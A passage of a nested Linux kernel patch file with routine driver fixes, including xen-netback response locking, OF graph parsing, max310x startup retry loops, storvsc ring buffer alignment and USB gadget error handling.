++	bool fw_ready_extra_delay;
+ 
+ 	struct mwifiex_sdio_mpa_tx mpa_tx;
+ 	struct mwifiex_sdio_mpa_rx mpa_rx;
+@@ -280,6 +282,7 @@ struct mwifiex_sdio_device {
+ 	bool fw_dump_enh;
+ 	bool can_auto_tdls;
+ 	bool can_ext_scan;
++	bool fw_ready_extra_delay;
+ };
+ 
+ /*
+diff --git a/drivers/net/xen-netback/netback.c b/drivers/net/xen-netback/netback.c
+index 2716040985748..0d51c900c5538 100644
+--- a/drivers/net/xen-netback/netback.c
++++ b/drivers/net/xen-netback/netback.c
+@@ -104,13 +104,12 @@ bool provides_xdp_headroom = true;
+ module_param(provides_xdp_headroom, bool, 0644);
+ 
+ static void xenvif_idx_release(struct xenvif_queue *queue, u16 pending_idx,
+-			       u8 status);
++			       s8 status);
+ 
+ static void make_tx_response(struct xenvif_queue *queue,
+-			     struct xen_netif_tx_request *txp,
++			     const struct xen_netif_tx_request *txp,
+ 			     unsigned int extra_count,
+-			     s8       st);
+-static void push_tx_responses(struct xenvif_queue *queue);
++			     s8 status);
+ 
+ static void xenvif_idx_unmap(struct xenvif_queue *queue, u16 pending_idx);
+ 
+@@ -208,13 +207,9 @@ static void xenvif_tx_err(struct xenvif_queue *queue,
+ 			  unsigned int extra_count, RING_IDX end)
+ {
+ 	RING_IDX cons = queue->tx.req_cons;
+-	unsigned long flags;
+ 
+ 	do {
+-		spin_lock_irqsave(&queue->response_lock, flags);
+ 		make_tx_response(queue, txp, extra_count, XEN_NETIF_RSP_ERROR);
+-		push_tx_responses(queue);
+-		spin_unlock_irqrestore(&queue->response_lock, flags);
+ 		if (cons == end)
+ 			break;
+ 		RING_COPY_REQUEST(&queue->tx, cons++, txp);
+@@ -465,12 +460,7 @@ static void xenvif_get_requests(struct xenvif_queue *queue,
+ 	for (shinfo->nr_frags = 0; nr_slots > 0 && shinfo->nr_frags < MAX_SKB_FRAGS;
+ 	     nr_slots--) {
+ 		if (unlikely(!txp->size)) {
+-			unsigned long flags;
+-
+-			spin_lock_irqsave(&queue->response_lock, flags);
+ 			make_tx_response(queue, txp, 0, XEN_NETIF_RSP_OKAY);
+-			push_tx_responses(queue);
+-			spin_unlock_irqrestore(&queue->response_lock, flags);
+ 			++txp;
+ 			continue;
+ 		}
+@@ -496,14 +486,8 @@ static void xenvif_get_requests(struct xenvif_queue *queue,
+ 
+ 		for (shinfo->nr_frags = 0; shinfo->nr_frags < nr_slots; ++txp) {
+ 			if (unlikely(!txp->size)) {
+-				unsigned long flags;
+-
+-				spin_lock_irqsave(&queue->response_lock, flags);
+ 				make_tx_response(queue, txp, 0,
+ 						 XEN_NETIF_RSP_OKAY);
+-				push_tx_responses(queue);
+-				spin_unlock_irqrestore(&queue->response_lock,
+-						       flags);
+ 				continue;
+ 			}
+ 
+@@ -997,7 +981,6 @@ static void xenvif_tx_build_gops(struct xenvif_queue *queue,
+ 					 (ret == 0) ?
+ 					 XEN_NETIF_RSP_OKAY :
+ 					 XEN_NETIF_RSP_ERROR);
+-			push_tx_responses(queue);
+ 			continue;
+ 		}
+ 
+@@ -1009,7 +992,6 @@ static void xenvif_tx_build_gops(struct xenvif_queue *queue,
+ 
+ 			make_tx_response(queue, &txreq, extra_count,
+ 					 XEN_NETIF_RSP_OKAY);
+-			push_tx_responses(queue);
+ 			continue;
+ 		}
+ 
+@@ -1444,8 +1426,35 @@ int xenvif_tx_action(struct xenvif_queue *queue, int budget)
+ 	return work_done;
+ }
+ 
++static void _make_tx_response(struct xenvif_queue *queue,
++			     const struct xen_netif_tx_request *txp,
++			     unsigned int extra_count,
++			     s8 status)
++{
++	RING_IDX i = queue->tx.rsp_prod_pvt;
++	struct xen_netif_tx_response *resp;
++
++	resp = RING_GET_RESPONSE(&queue->tx, i);
++	resp->id     = txp->id;
++	resp->status = status;
++
++	while (extra_count-- != 0)
++		RING_GET_RESPONSE(&queue->tx, ++i)->status = XEN_NETIF_RSP_NULL;
++
++	queue->tx.rsp_prod_pvt = ++i;
++}
++
++static void push_tx_responses(struct xenvif_queue *queue)
++{
++	int notify;
++
++	RING_PUSH_RESPONSES_AND_CHECK_NOTIFY(&queue->tx, notify);
++	if (notify)
++		notify_remote_via_irq(queue->tx_irq);
++}
++
+ static void xenvif_idx_release(struct xenvif_queue *queue, u16 pending_idx,
+-			       u8 status)
++			       s8 status)
+ {
+ 	struct pending_tx_info *pending_tx_info;
+ 	pending_ring_idx_t index;
+@@ -1455,8 +1464,8 @@ static void xenvif_idx_release(struct xenvif_queue *queue, u16 pending_idx,
+ 
+ 	spin_lock_irqsave(&queue->response_lock, flags);
+ 
+-	make_tx_response(queue, &pending_tx_info->req,
+-			 pending_tx_info->extra_count, status);
++	_make_tx_response(queue, &pending_tx_info->req,
++			  pending_tx_info->extra_count, status);
+ 
+ 	/* Release the pending index before pushing the Tx response so
+ 	 * it's available before a new Tx request is pushed by the
+@@ -1470,32 +1479,19 @@ static void xenvif_idx_release(struct xenvif_queue *queue, u16 pending_idx,
+ 	spin_unlock_irqrestore(&queue->response_lock, flags);
+ }
+ 
+-
+ static void make_tx_response(struct xenvif_queue *queue,
+-			     struct xen_netif_tx_request *txp,
++			     const struct xen_netif_tx_request *txp,
+ 			     unsigned int extra_count,
+-			     s8       st)
++			     s8 status)
+ {
+-	RING_IDX i = queue->tx.rsp_prod_pvt;
+-	struct xen_netif_tx_response *resp;
+-
+-	resp = RING_GET_RESPONSE(&queue->tx, i);
+-	resp->id     = txp->id;
+-	resp->status = st;
+-
+-	while (extra_count-- != 0)
+-		RING_GET_RESPONSE(&queue->tx, ++i)->status = XEN_NETIF_RSP_NULL;
++	unsigned long flags;
+ 
+-	queue->tx.rsp_prod_pvt = ++i;
+-}
++	spin_lock_irqsave(&queue->response_lock, flags);
+ 
+-static void push_tx_responses(struct xenvif_queue *queue)
+-{
+-	int notify;
++	_make_tx_response(queue, txp, extra_count, status);
++	push_tx_responses(queue);
+ 
+-	RING_PUSH_RESPONSES_AND_CHECK_NOTIFY(&queue->tx, notify);
+-	if (notify)
+-		notify_remote_via_irq(queue->tx_irq);
++	spin_unlock_irqrestore(&queue->response_lock, flags);
+ }
+ 
+ static void xenvif_idx_unmap(struct xenvif_queue *queue, u16 pending_idx)
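The xen-netback hunks above are a lock-hoisting refactor: the old open-coded lock/make/push/unlock sequences at every call site collapse into a locked make_tx_response() wrapper around an unlocked _make_tx_response() worker. The shape of that refactor in a standalone pthreads sketch (names invented):

#include <pthread.h>

static pthread_mutex_t response_lock = PTHREAD_MUTEX_INITIALIZER;

/* Unlocked worker: the caller must hold response_lock. */
static void _emit_response(int id, int status)
{
	/* ... write the response into the shared ring here ... */
	(void)id;
	(void)status;
}

/* Locked wrapper: external callers use this, so the lock/push/notify
 * boilerplate lives in exactly one place instead of at every site. */
static void emit_response(int id, int status)
{
	pthread_mutex_lock(&response_lock);
	_emit_response(id, status);
	/* the push_tx_responses() equivalent also runs under the lock */
	pthread_mutex_unlock(&response_lock);
}
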
+diff --git a/drivers/of/property.c b/drivers/of/property.c
+index b636777e6f7c8..33d5f16c81204 100644
+--- a/drivers/of/property.c
++++ b/drivers/of/property.c
+@@ -762,7 +762,9 @@ struct device_node *of_graph_get_port_parent(struct device_node *node)
+ 	/* Walk 3 levels up only if there is 'ports' node. */
+ 	for (depth = 3; depth && node; depth--) {
+ 		node = of_get_next_parent(node);
+-		if (depth == 2 && !of_node_name_eq(node, "ports"))
++		if (depth == 2 && !of_node_name_eq(node, "ports") &&
++		    !of_node_name_eq(node, "in-ports") &&
++		    !of_node_name_eq(node, "out-ports"))
+ 			break;
+ 	}
+ 	return node;
+@@ -1243,7 +1245,7 @@ DEFINE_SIMPLE_PROP(clocks, "clocks", "#clock-cells")
+ DEFINE_SIMPLE_PROP(interconnects, "interconnects", "#interconnect-cells")
+ DEFINE_SIMPLE_PROP(iommus, "iommus", "#iommu-cells")
+ DEFINE_SIMPLE_PROP(mboxes, "mboxes", "#mbox-cells")
+-DEFINE_SIMPLE_PROP(io_channels, "io-channel", "#io-channel-cells")
++DEFINE_SIMPLE_PROP(io_channels, "io-channels", "#io-channel-cells")
+ DEFINE_SIMPLE_PROP(interrupt_parent, "interrupt-parent", NULL)
+ DEFINE_SIMPLE_PROP(dmas, "dmas", "#dma-cells")
+ DEFINE_SIMPLE_PROP(power_domains, "power-domains", "#power-domain-cells")
+@@ -1261,7 +1263,6 @@ DEFINE_SIMPLE_PROP(pinctrl5, "pinctrl-5", NULL)
+ DEFINE_SIMPLE_PROP(pinctrl6, "pinctrl-6", NULL)
+ DEFINE_SIMPLE_PROP(pinctrl7, "pinctrl-7", NULL)
+ DEFINE_SIMPLE_PROP(pinctrl8, "pinctrl-8", NULL)
+-DEFINE_SIMPLE_PROP(remote_endpoint, "remote-endpoint", NULL)
+ DEFINE_SIMPLE_PROP(pwms, "pwms", "#pwm-cells")
+ DEFINE_SIMPLE_PROP(resets, "resets", "#reset-cells")
+ DEFINE_SIMPLE_PROP(leds, "leds", NULL)
+@@ -1326,6 +1327,17 @@ static struct device_node *parse_interrupts(struct device_node *np,
+ 	return of_irq_parse_one(np, index, &sup_args) ? NULL : sup_args.np;
+ }
+ 
++static struct device_node *parse_remote_endpoint(struct device_node *np,
++						 const char *prop_name,
++						 int index)
++{
++	/* Return NULL for index > 0 to signify end of remote-endpoints. */
++	if (!index || strcmp(prop_name, "remote-endpoint"))
++		return NULL;
++
++	return of_graph_get_remote_port_parent(np);
++}
++
+ static const struct supplier_bindings of_supplier_bindings[] = {
+ 	{ .parse_prop = parse_clocks, },
+ 	{ .parse_prop = parse_interconnects, },
+diff --git a/drivers/of/unittest.c b/drivers/of/unittest.c
+index e541a8960f1de..ce1386074e66b 100644
+--- a/drivers/of/unittest.c
++++ b/drivers/of/unittest.c
+@@ -49,6 +49,12 @@ static struct unittest_results {
+ 	failed; \
+ })
+ 
++#ifdef CONFIG_OF_KOBJ
++#define OF_KREF_READ(NODE) kref_read(&(NODE)->kobj.kref)
++#else
++#define OF_KREF_READ(NODE) 1
++#endif
++
+ /*
+  * Expected message may have a message level other than KERN_INFO.
+  * Print the expected message only if the current loglevel will allow
+@@ -562,7 +568,7 @@ static void __init of_unittest_parse_phandle_with_args_map(void)
+ 			pr_err("missing testcase data\n");
+ 			return;
+ 		}
+-		prefs[i] = kref_read(&p[i]->kobj.kref);
++		prefs[i] = OF_KREF_READ(p[i]);
+ 	}
+ 
+ 	rc = of_count_phandle_with_args(np, "phandle-list", "#phandle-cells");
+@@ -685,9 +691,9 @@ static void __init of_unittest_parse_phandle_with_args_map(void)
+ 	unittest(rc == -EINVAL, "expected:%i got:%i\n", -EINVAL, rc);
+ 
+ 	for (i = 0; i < ARRAY_SIZE(p); ++i) {
+-		unittest(prefs[i] == kref_read(&p[i]->kobj.kref),
++		unittest(prefs[i] == OF_KREF_READ(p[i]),
+ 			 "provider%d: expected:%d got:%d\n",
+-			 i, prefs[i], kref_read(&p[i]->kobj.kref));
++			 i, prefs[i], OF_KREF_READ(p[i]));
+ 		of_node_put(p[i]);
+ 	}
+ }
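The unittest hunk above wraps kref_read() in an OF_KREF_READ() macro that degrades to the constant 1 when CONFIG_OF_KOBJ is off, so the assertions stay valid without sprinkling #ifdefs through the tests. The same fallback-macro pattern in miniature (the config symbol and struct are invented for illustration):

struct node { int refcount; };

#ifdef HAVE_REFCOUNTS
# define REF_READ(n)	((n)->refcount)
#else
# define REF_READ(n)	1	/* no refcounting: comparisons stay trivially true */
#endif

/* Call sites compile unchanged either way. */
static int refs_unchanged(const struct node *n, int before)
{
	return REF_READ(n) == before;
}
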
+diff --git a/drivers/s390/net/qeth_l3_main.c b/drivers/s390/net/qeth_l3_main.c
+index c0f30cefec102..a416011391856 100644
+--- a/drivers/s390/net/qeth_l3_main.c
++++ b/drivers/s390/net/qeth_l3_main.c
+@@ -254,9 +254,10 @@ static void qeth_l3_clear_ip_htable(struct qeth_card *card, int recover)
+ 		if (!recover) {
+ 			hash_del(&addr->hnode);
+ 			kfree(addr);
+-			continue;
++		} else {
++			/* prepare for recovery */
++			addr->disp_flag = QETH_DISP_ADDR_ADD;
+ 		}
+-		addr->disp_flag = QETH_DISP_ADDR_ADD;
+ 	}
+ 
+ 	mutex_unlock(&card->ip_lock);
+@@ -277,9 +278,11 @@ static void qeth_l3_recover_ip(struct qeth_card *card)
+ 		if (addr->disp_flag == QETH_DISP_ADDR_ADD) {
+ 			rc = qeth_l3_register_addr_entry(card, addr);
+ 
+-			if (!rc) {
++			if (!rc || rc == -EADDRINUSE || rc == -ENETDOWN) {
++				/* keep it in the records */
+ 				addr->disp_flag = QETH_DISP_ADDR_DO_NOTHING;
+ 			} else {
++				/* bad address */
+ 				hash_del(&addr->hnode);
+ 				kfree(addr);
+ 			}
+diff --git a/drivers/scsi/fcoe/fcoe_ctlr.c b/drivers/scsi/fcoe/fcoe_ctlr.c
+index 8a4124e7d2043..ddc048069af25 100644
+--- a/drivers/scsi/fcoe/fcoe_ctlr.c
++++ b/drivers/scsi/fcoe/fcoe_ctlr.c
+@@ -319,17 +319,16 @@ static void fcoe_ctlr_announce(struct fcoe_ctlr *fip)
+ {
+ 	struct fcoe_fcf *sel;
+ 	struct fcoe_fcf *fcf;
+-	unsigned long flags;
+ 
+ 	mutex_lock(&fip->ctlr_mutex);
+-	spin_lock_irqsave(&fip->ctlr_lock, flags);
++	spin_lock_bh(&fip->ctlr_lock);
+ 
+ 	kfree_skb(fip->flogi_req);
+ 	fip->flogi_req = NULL;
+ 	list_for_each_entry(fcf, &fip->fcfs, list)
+ 		fcf->flogi_sent = 0;
+ 
+-	spin_unlock_irqrestore(&fip->ctlr_lock, flags);
++	spin_unlock_bh(&fip->ctlr_lock);
+ 	sel = fip->sel_fcf;
+ 
+ 	if (sel && ether_addr_equal(sel->fcf_mac, fip->dest_addr))
+@@ -700,7 +699,6 @@ int fcoe_ctlr_els_send(struct fcoe_ctlr *fip, struct fc_lport *lport,
+ {
+ 	struct fc_frame *fp;
+ 	struct fc_frame_header *fh;
+-	unsigned long flags;
+ 	u16 old_xid;
+ 	u8 op;
+ 	u8 mac[ETH_ALEN];
+@@ -734,11 +732,11 @@ int fcoe_ctlr_els_send(struct fcoe_ctlr *fip, struct fc_lport *lport,
+ 		op = FIP_DT_FLOGI;
+ 		if (fip->mode == FIP_MODE_VN2VN)
+ 			break;
+-		spin_lock_irqsave(&fip->ctlr_lock, flags);
++		spin_lock_bh(&fip->ctlr_lock);
+ 		kfree_skb(fip->flogi_req);
+ 		fip->flogi_req = skb;
+ 		fip->flogi_req_send = 1;
+-		spin_unlock_irqrestore(&fip->ctlr_lock, flags);
++		spin_unlock_bh(&fip->ctlr_lock);
+ 		schedule_work(&fip->timer_work);
+ 		return -EINPROGRESS;
+ 	case ELS_FDISC:
+@@ -1707,11 +1705,10 @@ static int fcoe_ctlr_flogi_send_locked(struct fcoe_ctlr *fip)
+ static int fcoe_ctlr_flogi_retry(struct fcoe_ctlr *fip)
+ {
+ 	struct fcoe_fcf *fcf;
+-	unsigned long flags;
+ 	int error;
+ 
+ 	mutex_lock(&fip->ctlr_mutex);
+-	spin_lock_irqsave(&fip->ctlr_lock, flags);
++	spin_lock_bh(&fip->ctlr_lock);
+ 	LIBFCOE_FIP_DBG(fip, "re-sending FLOGI - reselect\n");
+ 	fcf = fcoe_ctlr_select(fip);
+ 	if (!fcf || fcf->flogi_sent) {
+@@ -1722,7 +1719,7 @@ static int fcoe_ctlr_flogi_retry(struct fcoe_ctlr *fip)
+ 		fcoe_ctlr_solicit(fip, NULL);
+ 		error = fcoe_ctlr_flogi_send_locked(fip);
+ 	}
+-	spin_unlock_irqrestore(&fip->ctlr_lock, flags);
++	spin_unlock_bh(&fip->ctlr_lock);
+ 	mutex_unlock(&fip->ctlr_mutex);
+ 	return error;
+ }
+@@ -1739,9 +1736,8 @@ static int fcoe_ctlr_flogi_retry(struct fcoe_ctlr *fip)
+ static void fcoe_ctlr_flogi_send(struct fcoe_ctlr *fip)
+ {
+ 	struct fcoe_fcf *fcf;
+-	unsigned long flags;
+ 
+-	spin_lock_irqsave(&fip->ctlr_lock, flags);
++	spin_lock_bh(&fip->ctlr_lock);
+ 	fcf = fip->sel_fcf;
+ 	if (!fcf || !fip->flogi_req_send)
+ 		goto unlock;
+@@ -1768,7 +1764,7 @@ static void fcoe_ctlr_flogi_send(struct fcoe_ctlr *fip)
+ 	} else /* XXX */
+ 		LIBFCOE_FIP_DBG(fip, "No FCF selected - defer send\n");
+ unlock:
+-	spin_unlock_irqrestore(&fip->ctlr_lock, flags);
++	spin_unlock_bh(&fip->ctlr_lock);
+ }
+ 
+ /**
+diff --git a/drivers/scsi/storvsc_drv.c b/drivers/scsi/storvsc_drv.c
+index c2d981d5a2dd5..4fad9d85bd6f9 100644
+--- a/drivers/scsi/storvsc_drv.c
++++ b/drivers/scsi/storvsc_drv.c
+@@ -326,6 +326,7 @@ enum storvsc_request_type {
+  */
+ 
+ static int storvsc_ringbuffer_size = (128 * 1024);
++static int aligned_ringbuffer_size;
+ static u32 max_outstanding_req_per_channel;
+ static int storvsc_change_queue_depth(struct scsi_device *sdev, int queue_depth);
+ 
+@@ -683,8 +684,8 @@ static void handle_sc_creation(struct vmbus_channel *new_sc)
+ 	new_sc->next_request_id_callback = storvsc_next_request_id;
+ 
+ 	ret = vmbus_open(new_sc,
+-			 storvsc_ringbuffer_size,
+-			 storvsc_ringbuffer_size,
++			 aligned_ringbuffer_size,
++			 aligned_ringbuffer_size,
+ 			 (void *)&props,
+ 			 sizeof(struct vmstorage_channel_properties),
+ 			 storvsc_on_channel_callback, new_sc);
+@@ -1964,7 +1965,7 @@ static int storvsc_probe(struct hv_device *device,
+ 	dma_set_min_align_mask(&device->device, HV_HYP_PAGE_SIZE - 1);
+ 
+ 	stor_device->port_number = host->host_no;
+-	ret = storvsc_connect_to_vsp(device, storvsc_ringbuffer_size, is_fc);
++	ret = storvsc_connect_to_vsp(device, aligned_ringbuffer_size, is_fc);
+ 	if (ret)
+ 		goto err_out1;
+ 
+@@ -2157,7 +2158,7 @@ static int storvsc_resume(struct hv_device *hv_dev)
+ {
+ 	int ret;
+ 
+-	ret = storvsc_connect_to_vsp(hv_dev, storvsc_ringbuffer_size,
++	ret = storvsc_connect_to_vsp(hv_dev, aligned_ringbuffer_size,
+ 				     hv_dev_is_fc(hv_dev));
+ 	return ret;
+ }
+@@ -2191,8 +2192,9 @@ static int __init storvsc_drv_init(void)
+ 	 * the ring buffer indices) by the max request size (which is
+ 	 * vmbus_channel_packet_multipage_buffer + struct vstor_packet + u64)
+ 	 */
++	aligned_ringbuffer_size = VMBUS_RING_SIZE(storvsc_ringbuffer_size);
+ 	max_outstanding_req_per_channel =
+-		((storvsc_ringbuffer_size - PAGE_SIZE) /
++		((aligned_ringbuffer_size - PAGE_SIZE) /
+ 		ALIGN(MAX_MULTIPAGE_BUFFER_PACKET +
+ 		sizeof(struct vstor_packet) + sizeof(u64),
+ 		sizeof(u64)));
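The storvsc hunks above compute the page-aligned ring buffer size once, in storvsc_drv_init(), and reuse it for every vmbus_open() and the outstanding-request math. This sketch shows only the round-up-to-page-size idea; the real VMBUS_RING_SIZE() additionally reserves room for the ring header (the macro name here is illustrative):

#include <stdint.h>
#include <stdio.h>

#define PAGE_SIZE	4096u

/* Round 'bytes' up to a whole number of pages. */
#define RING_SIZE_ALIGNED(bytes) \
	(((bytes) + PAGE_SIZE - 1) & ~(PAGE_SIZE - 1))

int main(void)
{
	printf("%u\n", RING_SIZE_ALIGNED(128u * 1024u));	/* 131072 */
	printf("%u\n", RING_SIZE_ALIGNED(5000u));		/* 8192 */
	return 0;
}
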
+diff --git a/drivers/spi/spi-ppc4xx.c b/drivers/spi/spi-ppc4xx.c
+index d65f047b6c823..1179a1115137f 100644
+--- a/drivers/spi/spi-ppc4xx.c
++++ b/drivers/spi/spi-ppc4xx.c
+@@ -166,10 +166,8 @@ static int spi_ppc4xx_setupxfer(struct spi_device *spi, struct spi_transfer *t)
+ 	int scr;
+ 	u8 cdm = 0;
+ 	u32 speed;
+-	u8 bits_per_word;
+ 
+ 	/* Start with the generic configuration for this device. */
+-	bits_per_word = spi->bits_per_word;
+ 	speed = spi->max_speed_hz;
+ 
+ 	/*
+@@ -177,9 +175,6 @@ static int spi_ppc4xx_setupxfer(struct spi_device *spi, struct spi_transfer *t)
+ 	 * the transfer to overwrite the generic configuration with zeros.
+ 	 */
+ 	if (t) {
+-		if (t->bits_per_word)
+-			bits_per_word = t->bits_per_word;
+-
+ 		if (t->speed_hz)
+ 			speed = min(t->speed_hz, spi->max_speed_hz);
+ 	}
+diff --git a/drivers/staging/iio/impedance-analyzer/ad5933.c b/drivers/staging/iio/impedance-analyzer/ad5933.c
+index f177b20f0f2d9..ceba632138940 100644
+--- a/drivers/staging/iio/impedance-analyzer/ad5933.c
++++ b/drivers/staging/iio/impedance-analyzer/ad5933.c
+@@ -608,7 +608,7 @@ static void ad5933_work(struct work_struct *work)
+ 		struct ad5933_state, work.work);
+ 	struct iio_dev *indio_dev = i2c_get_clientdata(st->client);
+ 	__be16 buf[2];
+-	int val[2];
++	u16 val[2];
+ 	unsigned char status;
+ 	int ret;
+ 
+diff --git a/drivers/tty/serial/max310x.c b/drivers/tty/serial/max310x.c
+index 338cb19dec23c..163a89f84c9c2 100644
+--- a/drivers/tty/serial/max310x.c
++++ b/drivers/tty/serial/max310x.c
+@@ -237,6 +237,14 @@
+ #define MAX310x_REV_MASK		(0xf8)
+ #define MAX310X_WRITE_BIT		0x80
+ 
++/* Port startup definitions */
++#define MAX310X_PORT_STARTUP_WAIT_RETRIES	20 /* Number of retries */
++#define MAX310X_PORT_STARTUP_WAIT_DELAY_MS	10 /* Delay between retries */
++
++/* Crystal-related definitions */
++#define MAX310X_XTAL_WAIT_RETRIES	20 /* Number of retries */
++#define MAX310X_XTAL_WAIT_DELAY_MS	10 /* Delay between retries */
++
+ /* MAX3107 specific */
+ #define MAX3107_REV_ID			(0xa0)
+ 
+@@ -583,7 +591,7 @@ static int max310x_update_best_err(unsigned long f, long *besterr)
+ 	return 1;
+ }
+ 
+-static u32 max310x_set_ref_clk(struct device *dev, struct max310x_port *s,
++static s32 max310x_set_ref_clk(struct device *dev, struct max310x_port *s,
+ 			       unsigned long freq, bool xtal)
+ {
+ 	unsigned int div, clksrc, pllcfg = 0;
+@@ -641,12 +649,20 @@ static u32 max310x_set_ref_clk(struct device *dev, struct max310x_port *s,
+ 
+ 	/* Wait for crystal */
+ 	if (xtal) {
+-		unsigned int val;
+-		msleep(10);
+-		regmap_read(s->regmap, MAX310X_STS_IRQSTS_REG, &val);
+-		if (!(val & MAX310X_STS_CLKREADY_BIT)) {
+-			dev_warn(dev, "clock is not stable yet\n");
+-		}
++		bool stable = false;
++		unsigned int try = 0, val = 0;
++
++		do {
++			msleep(MAX310X_XTAL_WAIT_DELAY_MS);
++			regmap_read(s->regmap, MAX310X_STS_IRQSTS_REG, &val);
++
++			if (val & MAX310X_STS_CLKREADY_BIT)
++				stable = true;
++		} while (!stable && (++try < MAX310X_XTAL_WAIT_RETRIES));
++
++		if (!stable)
++			return dev_err_probe(dev, -EAGAIN,
++					     "clock is not stable\n");
+ 	}
+ 
+ 	return bestfreq;
+@@ -1274,7 +1290,7 @@ static int max310x_probe(struct device *dev, const struct max310x_devtype *devty
+ {
+ 	int i, ret, fmin, fmax, freq;
+ 	struct max310x_port *s;
+-	u32 uartclk = 0;
++	s32 uartclk = 0;
+ 	bool xtal;
+ 
+ 	for (i = 0; i < devtype->nr; i++)
+@@ -1337,6 +1353,9 @@ static int max310x_probe(struct device *dev, const struct max310x_devtype *devty
+ 		goto out_clk;
+ 
+ 	for (i = 0; i < devtype->nr; i++) {
++		bool started = false;
++		unsigned int try = 0, val = 0;
++
+ 		/* Reset port */
+ 		regmap_write(regmaps[i], MAX310X_MODE2_REG,
+ 			     MAX310X_MODE2_RST_BIT);
+@@ -1345,13 +1364,27 @@ static int max310x_probe(struct device *dev, const struct max310x_devtype *devty
+ 
+ 		/* Wait for port startup */
+ 		do {
+-			regmap_read(regmaps[i], MAX310X_BRGDIVLSB_REG, &ret);
+-		} while (ret != 0x01);
++			msleep(MAX310X_PORT_STARTUP_WAIT_DELAY_MS);
++			regmap_read(regmaps[i], MAX310X_BRGDIVLSB_REG, &val);
++
++			if (val == 0x01)
++				started = true;
++		} while (!started && (++try < MAX310X_PORT_STARTUP_WAIT_RETRIES));
++
++		if (!started) {
++			ret = dev_err_probe(dev, -EAGAIN, "port reset failed\n");
++			goto out_uart;
++		}
+ 
+ 		regmap_write(regmaps[i], MAX310X_MODE1_REG, devtype->mode1);
+ 	}
+ 
+ 	uartclk = max310x_set_ref_clk(dev, s, freq, xtal);
++	if (uartclk < 0) {
++		ret = uartclk;
++		goto out_uart;
++	}
++
+ 	dev_dbg(dev, "Reference clock set to %i Hz\n", uartclk);
+ 
+ 	for (i = 0; i < devtype->nr; i++) {
+diff --git a/drivers/usb/common/ulpi.c b/drivers/usb/common/ulpi.c
+index 38703781ee2d1..1283c427cdf88 100644
+--- a/drivers/usb/common/ulpi.c
++++ b/drivers/usb/common/ulpi.c
+@@ -301,7 +301,7 @@ static int ulpi_register(struct device *dev, struct ulpi *ulpi)
+ 		return ret;
+ 	}
+ 
+-	root = debugfs_create_dir(dev_name(dev), ulpi_root);
++	root = debugfs_create_dir(dev_name(&ulpi->dev), ulpi_root);
+ 	debugfs_create_file("regs", 0444, root, ulpi, &ulpi_regs_fops);
+ 
+ 	dev_dbg(&ulpi->dev, "registered ULPI PHY: vendor %04x, product %04x\n",
+diff --git a/drivers/usb/core/hub.c b/drivers/usb/core/hub.c
+index 4f181110d00db..d960a56b760ec 100644
+--- a/drivers/usb/core/hub.c
++++ b/drivers/usb/core/hub.c
+@@ -2389,17 +2389,25 @@ static int usb_enumerate_device_otg(struct usb_device *udev)
+ 			}
+ 		} else if (desc->bLength == sizeof
+ 				(struct usb_otg_descriptor)) {
+-			/* Set a_alt_hnp_support for legacy otg device */
+-			err = usb_control_msg(udev,
+-				usb_sndctrlpipe(udev, 0),
+-				USB_REQ_SET_FEATURE, 0,
+-				USB_DEVICE_A_ALT_HNP_SUPPORT,
+-				0, NULL, 0,
+-				USB_CTRL_SET_TIMEOUT);
+-			if (err < 0)
+-				dev_err(&udev->dev,
+-					"set a_alt_hnp_support failed: %d\n",
+-					err);
++			/*
++			 * We are operating on a legacy OTG device.
++			 * It should be told that it is operating on the
++			 * wrong port if we have another port that does
++			 * support HNP.
++			 */
++			if (bus->otg_port != 0) {
++				/* Set a_alt_hnp_support for legacy otg device */
++				err = usb_control_msg(udev,
++					usb_sndctrlpipe(udev, 0),
++					USB_REQ_SET_FEATURE, 0,
++					USB_DEVICE_A_ALT_HNP_SUPPORT,
++					0, NULL, 0,
++					USB_CTRL_SET_TIMEOUT);
++				if (err < 0)
++					dev_err(&udev->dev,
++						"set a_alt_hnp_support failed: %d\n",
++						err);
++			}
+ 		}
+ 	}
+ #endif
+diff --git a/drivers/usb/dwc3/gadget.c b/drivers/usb/dwc3/gadget.c
+index c4703f6b20894..576c21bf77cda 100644
+--- a/drivers/usb/dwc3/gadget.c
++++ b/drivers/usb/dwc3/gadget.c
+@@ -4583,15 +4583,13 @@ int dwc3_gadget_suspend(struct dwc3 *dwc)
+ 	unsigned long flags;
+ 	int ret;
+ 
+-	if (!dwc->gadget_driver)
+-		return 0;
+-
+ 	ret = dwc3_gadget_soft_disconnect(dwc);
+ 	if (ret)
+ 		goto err;
+ 
+ 	spin_lock_irqsave(&dwc->lock, flags);
+-	dwc3_disconnect_gadget(dwc);
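++	/* Suspend can now run with no gadget driver bound; only notify one if present. */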
++	if (dwc->gadget_driver)
++		dwc3_disconnect_gadget(dwc);
+ 	spin_unlock_irqrestore(&dwc->lock, flags);
+ 
+ 	return 0;
+diff --git a/drivers/usb/gadget/function/f_mass_storage.c b/drivers/usb/gadget/function/f_mass_storage.c
+index 7b9a4cf9b100c..d35f30a9cae2c 100644
+--- a/drivers/usb/gadget/function/f_mass_storage.c
++++ b/drivers/usb/gadget/function/f_mass_storage.c
+@@ -544,21 +544,37 @@ static int start_transfer(struct fsg_dev *fsg, struct usb_ep *ep,
+ 
+ static bool start_in_transfer(struct fsg_common *common, struct fsg_buffhd *bh)
+ {
++	int rc;
++
+ 	if (!fsg_is_set(common))
+ 		return false;
+ 	bh->state = BUF_STATE_SENDING;
+-	if (start_transfer(common->fsg, common->fsg->bulk_in, bh->inreq))
++	rc = start_transfer(common->fsg, common->fsg->bulk_in, bh->inreq);
++	if (rc) {
+ 		bh->state = BUF_STATE_EMPTY;
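++		/* -ESHUTDOWN: the endpoint is disabled (e.g. on disconnect); stop running. */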
++		if (rc == -ESHUTDOWN) {
++			common->running = 0;
++			return false;
++		}
++	}
+ 	return true;
+ }
+ 
+ static bool start_out_transfer(struct fsg_common *common, struct fsg_buffhd *bh)
+ {
++	int rc;
++
+ 	if (!fsg_is_set(common))
+ 		return false;
+ 	bh->state = BUF_STATE_RECEIVING;
+-	if (start_transfer(common->fsg, common->fsg->bulk_out, bh->outreq))
++	rc = start_transfer(common->fsg, common->fsg->bulk_out, bh->outreq);
++	if (rc) {
+ 		bh->state = BUF_STATE_FULL;
++		if (rc == -ESHUTDOWN) {
++			common->running = 0;
++			return false;
++		}
++	}
+ 	return true;
+ }
+ 
+diff --git a/drivers/usb/typec/ucsi/ucsi.c b/drivers/usb/typec/ucsi/ucsi.c
+index dc2dea3768fb6..0695ee54ff781 100644
+--- a/drivers/usb/typec/ucsi/ucsi.c
++++ b/drivers/usb/typec/ucsi/ucsi.c
